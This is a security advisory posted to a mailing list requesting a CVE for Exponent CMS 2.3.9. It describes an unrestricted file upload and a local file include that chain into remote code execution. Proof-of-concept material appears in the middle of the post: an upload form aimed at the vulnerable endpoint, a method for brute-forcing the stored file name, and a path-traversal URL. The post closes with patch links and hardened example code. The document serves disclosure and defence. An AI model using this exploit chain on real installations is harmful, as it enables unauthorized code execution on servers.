oss-sec mailing list archives
CVE request:Exponent CMS 2.3.9 Unrestricted File Upload RCE and Local File include vulnerability
From: "DM_" <contact () x0day me>
Date: Wed, 21 Sep 2016 10:08:21 +0800
Hi,

This is YongXiao Ma of Silence's PKAV Team. I reported some security issues to ExponentCMS some days ago.

# Test environment

exponent version: latest 2.3.9
php: 5.5.x
server: apache 2.2.x

# Details

1. Unrestricted File Upload

There is an unrestricted file upload issue at framework/modules/forms/controllers/formsController.php, and the uploaded file is placed in /tmp/, where PHP scripts can be executed. Although we don't know the file name, we can brute-force it simply, since it is time() + "_" + upload name.

```php
public function import_csv_mapper() {
    //Check to make sure the user filled out the required input.
    if (!is_numeric($this->params["rowstart"])) {
        unset($this->params["rowstart"]);
        $this->params['_formError'] = gt('The starting row must be a number.');
        expSession::set("last_POST", $this->params);
        header("Location: " . $_SERVER['HTTP_REFERER']);
        exit('Redirecting...');
    }
    if (!empty($this->params['forms_id'])) {
        // if we are importing to an existing form, jump to that step
        $this->import_csv_data_mapper();
    } else {
        //Get the temp directory to put the uploaded file
        $directory = "tmp";
        //Get the file save it to the temp directory
        if ($_FILES["upload"]["error"] == UPLOAD_ERR_OK) {
            // $file = file::update("upload",$directory,null,time()."_".$_FILES['upload']['name']);
            $file = expFile::fileUpload("upload", false, false, time() . "_" . $_FILES['upload']['name'], $directory.'/');
            //FIXME quick hack to remove file model
            ....
```

POC:

```html
<!DOCTYPE html>
<html>
<form action="http://localhost/exponent-2.3.9/index.php?controller=forms&action=import_csv_mapper&forms_id=1&rowstart=0" method="POST" enctype="multipart/form-data">
<input type="file" name="upload">
<input type="submit" name="submit">
</form>
</html>
```

2. LFI

Then the LFI comes, at exponent-2.3.9/install/popup.php:

```php
<?php
$page = (isset($_REQUEST['page']) ? expString::sanitize($_REQUEST['page']) : '');
if (is_readable('popups/' . $page . '.php')) {
    include('popups/' . $page . '.php');
}
?>
```

So we can upload a PHP file, then include it to get RCE again.

POC: http://127.0.0.1/exponent-2.3.9/install/popup.php?page=../../files/test

# Patches

https://exponentcms.lighthouseapp.com/projects/61783/changesets/355702a9835cf527796c9d469a82258b7639148a
https://exponentcms.lighthouseapp.com/projects/61783/changesets/628ea61834d92611644a1dfc1ba24216ee647c59
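As an added example (not Exponent CMS code and not the content of the linked changesets), here are hardened versions of the two patterns quoted above: the include path is restricted to an allowlist and checked against the resolved directory, and the upload ignores the client-supplied name and extension entirely. The directory names, the allowed page names and the function names are assumptions.

```php
<?php
// Added example, not Exponent CMS code. Directory names and page names are assumed.

// 1. LFI: never build an include path from request input. Accept only an
//    explicit allowlist of page names, then still confirm the resolved path
//    stays inside the popups directory (catches traversal and symlink escapes).
function safePopupInclude(string $page, string $popupsDir): bool {
    static $allowed = ['welcome', 'license', 'database'];  // assumed page names
    if (!preg_match('/^[a-z0-9_-]{1,32}$/', $page) || !in_array($page, $allowed, true)) {
        return false;
    }
    $base   = realpath($popupsDir);
    $target = realpath($popupsDir . '/' . $page . '.php');
    if ($base === false || $target === false
        || strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;  // resolved file is not directly under popups/
    }
    include $target;
    return true;
}

// 2. Upload: the original trusts $_FILES['upload']['name'] and a guessable
//    time()-based prefix. Here the stored name is random with a fixed .csv
//    extension, the content must look like text, and $storeDir is assumed to be
//    outside the web root (or served with PHP execution disabled).
function storeCsvUpload(array $file, string $storeDir): ?string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // libmagic reports PHP source as text/x-php, so a script payload is rejected here.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!in_array($mime, ['text/plain', 'text/csv'], true)) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.csv';  // unguessable, extension not attacker-controlled
    $dest = rtrim($storeDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0640);  // readable by the application, never executable
    return $dest;
}
```

The returned path, rather than a name derived from the request, is what the CSV mapper should read from afterwards.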